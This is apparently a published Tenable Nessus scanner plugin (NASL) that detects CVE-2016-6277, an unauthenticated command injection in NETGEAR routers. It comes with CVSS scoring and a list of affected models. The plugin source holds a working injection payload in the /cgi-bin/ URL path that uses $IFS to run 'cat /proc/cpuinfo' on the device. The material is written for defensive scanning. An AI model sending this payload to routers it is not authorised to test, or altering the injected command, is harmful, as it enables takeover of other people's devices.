nessus | This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof. | NETGEAR_CMD_EXEC.NASL
History: Dec 14, 2016 - 12:00 a.m.

NETGEAR Multiple Model cgi-bin RCE

2016-12-14 00:00:00
This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.975 High

EPSS

Percentile

100.0%

The remote NETGEAR router is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /cgi-bin/. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to execute arbitrary commands on the device.

Note that Nessus has detected this vulnerability by reading the contents of file /proc/cpuinfo.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration block: when the scanner loads the plugin with
# `description` set, only metadata is registered and the plugin exits
# here; the active check further down never runs in that mode.
if (description)
{
  script_id(95823);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/04/25");

  # Cross-references for the same issue: CVE, CERT VU#, Exploit-DB entry,
  # and the date it was added to the CISA Known Exploited Vulnerabilities list.
  script_cve_id("CVE-2016-6277");
  script_xref(name:"CERT", value:"582384");
  script_xref(name:"EDB-ID", value:"40889");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/09/07");

  script_name(english:"NETGEAR Multiple Model cgi-bin RCE");

  script_set_attribute(attribute:"synopsis", value:
"The remote router is affected by a remote command execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote NETGEAR router is affected by a remote command execution
vulnerability due to improper sanitization of user-supplied input
passed via /cgi-bin/. An unauthenticated, remote attacker can exploit
this, via a specially crafted URL, to execute arbitrary commands on
the device.

Note that Nessus has detected this vulnerability by reading the
contents of file /proc/cpuinfo.");
  script_set_attribute(attribute:"see_also", value:"https://kb.netgear.com/000036386/CVE-2016-582384");
  script_set_attribute(attribute:"solution", value:
"Apply the latest available firmware update according to the vendor
advisory.");
  # Scoring: CVSS2 and CVSS3 base/temporal vectors; the score source is the CVE itself.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6277");

  # exploited_by_nessus is "true": this is an active check that triggers the
  # flaw on the target (see script_category(ACT_ATTACK) below), not a
  # version-based inference. Schedule it accordingly on production devices.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Netgear R7000 and R6400 cgi-bin Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/08");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/02/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/14");

  # Affected platforms, one CPE per firmware line covered by the advisory.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:d6220_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:d6400_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6250_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6400_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6700_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r6900_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7000_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7100lg_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7300dst_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r7900_firmware");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:netgear:r8000_firmware");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Gating: only runs after the Netgear web UI has been fingerprinted and
  # against hosts exposing an HTTP service (80/443 or a detected www port).
  script_dependencies("netgear_www_detect.nbin");
  script_require_keys("installed_sw/Netgear WWW");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("install_func.inc");
include("misc_func.inc");
include("http.inc");

# Active check. Bail out unless the dependency plugin recorded a Netgear web UI
# on this host, so the probe is never sent to unrelated HTTP servers.
get_install_count(app_name:"Netgear WWW", exit_if_zero:TRUE);
# embedded:TRUE — presumably selects the port-handling suited to an embedded
# device's web server; confirm against http.inc.
port = get_http_port(default:80, embedded:TRUE);
# NOTE(review): install is fetched but not referenced below.
install = get_single_install(app_name:"Netgear WWW", port:port);

# Probe path. It carries the same command that is reported as `cmd` in the
# security report below; the target file (/proc/cpuinfo) was chosen because it
# is read-only and its content is recognisable, so a hit is proven by output
# without changing device state. For defenders: a /cgi-bin/ request whose path
# contains ';' is the signature of this issue in web-server access logs.
exploit = "/cgi-bin/;cd$IFS'proc';cat$IFS'cpuinfo'";
# exit_on_fail:TRUE — presumably ends the plugin (no finding) on transport
# failure, so only a real response is evaluated; confirm against http.inc.
res = http_send_recv3(
  method       : "GET",
  item         : exploit,
  port         : port,
  exit_on_fail : TRUE
);

# res[2] is treated as the response body below; fold case so the markers
# match regardless of how the device capitalises them.
res[2] = tolower(res[2]);

# Vulnerable only if the body contains /proc/cpuinfo markers. Both strings
# must be present, so an HTTP 200 with a generic page does not count.
if (
  "bogomips" >< res[2] &&
  "processor" >< res[2]
)
{
  output = chomp(res[2]);

  # just in case, res[2] should have command output only
  # (if the device wrapped the output in an HTML page, keep what follows </html>)
  if("</html>" >< output)
    output = chomp(substr(output, stridx(output,"</html>")+strlen("</html>")));

  # Trim leading whitespace so the evidence starts at the first output line.
  output = ereg_replace(string: output, pattern: "^[ \t\r\n]*", replace: "");

  # If trimming left nothing, fall back to the raw body rather than an empty report.
  if (empty_or_null(output)) output = res[2];

  # Report: the exact request URL is attached as reproduction evidence and the
  # captured output as proof of execution.
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    cmd         : "cd proc; cat cpuinfo",
    request     : make_list(build_url(qs:exploit, port:port)),
    output      : output
  );
  exit(0);
}
# No markers in the body: the device did not execute the command.
else audit(AUDIT_HOST_NOT, "an affected NETGEAR device");

Vendor | Product | Version | CPE
netgear | d6220_firmware | | cpe:/o:netgear:d6220_firmware
netgear | d6400_firmware | | cpe:/o:netgear:d6400_firmware
netgear | r6250_firmware | | cpe:/o:netgear:r6250_firmware
netgear | r6400_firmware | | cpe:/o:netgear:r6400_firmware
netgear | r6700_firmware | | cpe:/o:netgear:r6700_firmware
netgear | r6900_firmware | | cpe:/o:netgear:r6900_firmware
netgear | r7000_firmware | | cpe:/o:netgear:r7000_firmware
netgear | r7100lg_firmware | | cpe:/o:netgear:r7100lg_firmware
netgear | r7300dst_firmware | | cpe:/o:netgear:r7300dst_firmware
netgear | r7900_firmware | | cpe:/o:netgear:r7900_firmware
